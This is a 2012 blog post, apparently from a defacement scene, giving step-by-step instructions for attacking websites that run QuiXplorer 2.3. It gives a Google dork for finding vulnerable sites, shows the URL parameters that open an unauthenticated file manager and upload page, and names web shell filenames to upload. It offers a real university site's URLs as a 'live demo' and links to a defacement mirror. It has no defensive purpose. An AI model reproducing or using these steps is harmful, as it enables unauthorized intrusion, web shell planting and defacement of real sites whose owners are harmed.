Tuesday, May 15, 2012

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability" Upload shell and deface easily

"QuiXplorer 2.3 <= Bugtraq File Upload Vulnerability"


computer-virus-iran-power-nuclear.jpg (400×300)


open Google.com and type this dork 
intitle:"QuiXplorer 2.3 - the QuiX project"


you'll see a lot of sites, some big websites are vuln too like haeward university website,
select any website from search results
Vulnerablity


http://[localhost]/[path]/index.php?action=list&order=name&srt=yes




http://site.com/[xyz]/index.php?action=list&order=name&srt=yes
 after Going to this you will saw a file manager 
you can upload your files here 


find this edit file create file etc icons in page and click on last, its upload option







You can direct upload too with chnaging url, just put action=upload&order=name&srt=yes
after index.php?
example : 
http://site.com/[xyz]/index.php?action=upload&order=name&srt=yes
Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or,,
- anything support file
click On you file For view 
Live demo : 
http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=list&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/files/index.php?action=upload&order=name&srt=yes

http://www.hcs.harvard.edu/~eac/letters/filestorage/  
i know some asshole will chnage the deface 
so its mirrOr of defacements http://attack-h.org/attack/?id=8452


0 comments: